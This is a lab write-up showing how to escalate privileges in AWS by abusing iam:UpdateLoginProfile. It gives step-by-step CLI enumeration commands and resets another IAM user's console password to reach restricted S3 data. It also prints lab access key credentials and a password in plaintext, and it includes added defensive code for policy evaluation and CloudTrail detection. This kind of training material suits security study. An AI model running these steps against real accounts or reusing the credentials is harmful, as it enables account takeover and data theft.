AWS Pentesting: IAM Privilege Escalation via iam:UpdateLoginProfile

@ro0taddict
6 min read · Dec 26, 2024


In this writeup, we will do another walkthrough of Cybr’s IAM UpdateLoginProfile PrivEsc lab, which highlights privilege escalation by abusing the iam:UpdateLoginProfile permission, an IAM action that changes the console password of the specified IAM user.

The image below shows that our IAM user is “iam-updateloginprofile-privesc-1735204289491-Attacker”.

Let’s run the aws-enumerator tool as usual, using the commands below. We can get this tool from this link. Other tools that you may try are Andres Riancho’s enumerate-iam, which we can get from this link, or bf-aws-permissions by Carlos Polop.

./aws-enumerator cred -aws_access_key_id AKIAVDN5CV7VEBDQP74D -aws_secret_access_key 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
./aws-enumerator enum -services all -speed slow
./aws-enumerator dump -services sts,iam

Based on the output, we can GetUser, ListUsers, ListGroups, ListPolicies, and ListAccessKeys.

Let’s get a high-level overview of the AWS services used by the target organization. I normally use CloudFox with the “inventory” option or Prowler with the “quick-check” option for this use case.

./cloudfox aws --profile <profile name> inventory
./cloudfox aws --profile UpdateLoginProfile inventory

The lab states that our main goal is to escalate our permissions so we can read the contents of the restricted S3 buckets.

The CloudFox output above shows that S3 is in use by the target organization.

Let’s run the S3 commands below to check whether we have permission to list the buckets and to get their contents.

aws s3 ls --profile <profile name>
aws s3 ls --profile UpdateLoginProfile

The output above shows that our IAM user has no permission to list the contents of the buckets.

Recon for Users, Groups and Roles.

Next, let’s recon the policies of the user and of the roles and groups of which our user is a member. The output of aws-enumerator shows we don’t have permission to list roles, so we can focus on the policies for the user and the group.

To review the permissions on the group, I typically first identify the group to which our user belongs. Next, I examine any inline and attached policies applied to that group, check the versions of those policies, and then retrieve the details of those policies.

In this lab, we will focus on the policies applied to the user and to the group.

Let’s run “list-user-policies” and “list-attached-user-policies” to check for inline and attached policies applied to the user.

aws iam list-user-policies --user-name <username> --profile <profile name>
aws iam list-user-policies --user-name iam-updateloginprofile-privesc-1735204289491-Attacker --profile UpdateLoginProfile

aws iam list-attached-user-policies --user-name <username> --profile <profile name>
aws iam list-attached-user-policies --user-name iam-updateloginprofile-privesc-1735204289491-Attacker --profile UpdateLoginProfile

The image above shows that there are no inline or attached policies applied to this user.

Next, let’s run the list-groups-for-user command to identify the groups our current IAM user is a member of.

aws iam list-groups-for-user --user-name <user-name> --profile <profile name>
aws iam list-groups-for-user --user-name iam-updateloginprofile-privesc-1735204289491-Attacker --profile UpdateLoginProfile

The image below shows that there is a group named “iam-updateloginprofile-privesc-1735204289491-Developers”.

We could also check the other groups using the “list-groups” command, but as the lab title suggests, we can first focus on the policies for the current group and the list of users.

aws iam list-group-policies --group-name <group name> --profile <profile name>
aws iam list-group-policies --group-name iam-updateloginprofile-privesc-1735204289491-Developers --profile UpdateLoginProfile

The image below shows that there is a group policy named iam-updateloginprofile-privesc-1735204289491-policy.

Let’s get this policy document using the command below.

aws iam get-group-policy --group-name <group name> --policy-name <policy name> --profile <profile name>
aws iam get-group-policy --group-name iam-updateloginprofile-privesc-1735204289491-Developers --policy-name iam-updateloginprofile-privesc-1735204289491-policy --profile UpdateLoginProfile

The image below indicates that three users, Attacker, Mark, and Bob, are granted multiple permissions, including iam:UpdateLoginProfile and iam:CreateLoginProfile. However, a subsequent policy explicitly denies certain actions for Attacker, Mark, and Alice. It’s important to note that in AWS Identity and Access Management (IAM), if a user has both an explicit allow and an explicit deny for the same action, the explicit deny takes precedence and overrides the allow.
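The allow/deny precedence just described, worked out in code as an added example (not part of the original post or the lab): a small evaluator over a constructed policy shaped like the lab’s group policy, with a placeholder account ID, that reports which user ARNs remain writable for iam:UpdateLoginProfile once explicit denies are applied. This is what a policy reviewer would run to find the users a group can reset passwords for, instead of reading the statements by eye.

```python
# Added example (not from the original post): applies the explicit-deny-beats-
# allow rule the walkthrough relies on. The policy below is a constructed
# stand-in shaped like the lab's group policy, not the real document.
import fnmatch

ACCOUNT = "123456789012"  # constructed placeholder account id
PREFIX = "iam-updateloginprofile-privesc-1735204289491"

def user_arn(name):
    return f"arn:aws:iam::{ACCOUNT}:user/{PREFIX}-{name}"

# Constructed policy: one Allow over three users, one explicit Deny over three.
POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:UpdateLoginProfile", "iam:CreateLoginProfile", "iam:GetUser"],
         "Resource": [user_arn("Attacker"), user_arn("Mark"), user_arn("Bob")]},
        {"Effect": "Deny",
         "Action": ["iam:UpdateLoginProfile", "iam:CreateLoginProfile"],
         "Resource": [user_arn("Attacker"), user_arn("Mark"), user_arn("Alice")]},
    ],
}

def _as_list(v):
    return v if isinstance(v, list) else [v]

def _matches(statement, action, resource):
    """IAM wildcards (* and ?) are glob-like; action names match case-insensitively."""
    acts = [a.lower() for a in _as_list(statement.get("Action", []))]
    res = _as_list(statement.get("Resource", []))
    return (any(fnmatch.fnmatchcase(action.lower(), a) for a in acts)
            and any(fnmatch.fnmatchcase(resource, r) for r in res))

def is_allowed(policy, action, resource):
    """Explicit Deny wins over any Allow; no matching Allow is an implicit deny."""
    effects = {s["Effect"] for s in policy["Statement"] if _matches(s, action, resource)}
    return "Deny" not in effects and "Allow" in effects

def writable_login_profiles(policy, user_names):
    """Users whose console password this policy lets the caller set via UpdateLoginProfile."""
    return [u for u in user_names
            if is_allowed(policy, "iam:UpdateLoginProfile", user_arn(u))]

if __name__ == "__main__":
    print(writable_login_profiles(POLICY, ["Attacker", "Mark", "Bob", "Alice"]))  # ['Bob']
```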

Let’s also check all 4 users (as also shown in the CloudFox output) in the environment.

aws iam list-users --profile <profile name>
aws iam list-users --profile UpdateLoginProfile

Based on the recon results, we can update the login profile of the “iam-updateloginprofile-privesc-1735204289491-Bob” user.

Optionally, you may cross-check this privilege escalation vector using Pacu. See my other walkthrough at this link on how to set up Pacu.

run iam__enum_permissions
run iam__enum_users_roles_policies_groups
run iam__privesc_scan

As shown above, Pacu was not able to detect this UpdateLoginProfile privilege escalation attack vector.

Let’s now update Bob’s login profile using the command below.

aws iam update-login-profile --user-name <target-username> --password <password> --no-password-reset-required --profile <profile name>
aws iam update-login-profile --user-name iam-updateloginprofile-privesc-1735204289491-Bob --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile UpdateLoginProfile

The command above returned no error, indicating that it was accepted.

As the last few steps, access the console via the link below and change the region to us-east-1.

https://console.aws.amazon.com/console/home?nc2=h_ct&

We can then download the contents of the S3 buckets.

Conclusion:

In this walkthrough, we showed how privilege escalation can be performed by abusing the iam:UpdateLoginProfile permission. To mitigate this risk, restrict the permission to trusted administrators only, ensuring that regular users cannot modify login profiles unless there is a strong business use case. Additionally, implement multi-factor authentication (MFA) and adhere to the principle of least privilege to enhance overall security.
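On the detection side of the mitigation above, an added example (not from the original post): a CloudTrail triage check that flags UpdateLoginProfile and CreateLoginProfile events where the caller is not the target user and not on an admin allowlist. The records, the allowlist and the account prefix are constructed samples in CloudTrail’s documented record shape, not real logs.

```python
# Added example (not from the original post): a CloudTrail triage check for
# the technique above. Records below are constructed samples in CloudTrail's
# documented shape (eventName, userIdentity, requestParameters), not real logs.
import json

# Constructed sample: the walkthrough's Attacker setting Bob's console password,
# plus a benign self-service password change and an admin CreateLoginProfile.
PREFIX = "iam-updateloginprofile-privesc-1735204289491"
RECORDS = [
    {"eventTime": "2024-12-26T10:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "UpdateLoginProfile",
     "userIdentity": {"type": "IAMUser", "userName": f"{PREFIX}-Attacker"},
     "requestParameters": {"userName": f"{PREFIX}-Bob", "passwordResetRequired": False}},
    {"eventTime": "2024-12-26T10:05:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "UpdateLoginProfile",
     "userIdentity": {"type": "IAMUser", "userName": f"{PREFIX}-Mark"},
     "requestParameters": {"userName": f"{PREFIX}-Mark"}},
    {"eventTime": "2024-12-26T10:07:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateLoginProfile",
     "userIdentity": {"type": "IAMUser", "userName": "helpdesk-admin"},
     "requestParameters": {"userName": f"{PREFIX}-Alice", "passwordResetRequired": True}},
]

ADMIN_ALLOWLIST = {"helpdesk-admin"}  # constructed: principals expected to manage passwords
LOGIN_PROFILE_EVENTS = {"UpdateLoginProfile", "CreateLoginProfile"}

def triage_login_profile_events(records, allowlist=ADMIN_ALLOWLIST):
    """Return alerts for console-password changes made on someone else's user.

    A self-service change (caller == target) is routine; a change by a principal
    outside the admin allowlist is the pattern this walkthrough demonstrates.
    """
    alerts = []
    for r in records:
        if (r.get("eventSource") != "iam.amazonaws.com"
                or r.get("eventName") not in LOGIN_PROFILE_EVENTS):
            continue
        caller = r.get("userIdentity", {}).get("userName")
        target = r.get("requestParameters", {}).get("userName")
        if caller == target or caller in allowlist:
            continue
        # passwordResetRequired=False mirrors --no-password-reset-required above.
        severity = "high" if r["requestParameters"].get("passwordResetRequired") is False else "medium"
        alerts.append({"time": r["eventTime"], "event": r["eventName"], "caller": caller,
                       "target": target, "severity": severity})
    return alerts

if __name__ == "__main__":
    print(json.dumps(triage_login_profile_events(RECORDS), indent=2))
```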

In this lab, we also showed our recon methodology on IAM permissions and covered tools such as IAM Enumerator, Cloudfox, and Pacu.

References:

https://cybr.com/hands-on-labs/lab/iam-updateloginprofile-privesc/
https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/
https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateLoginProfile.html
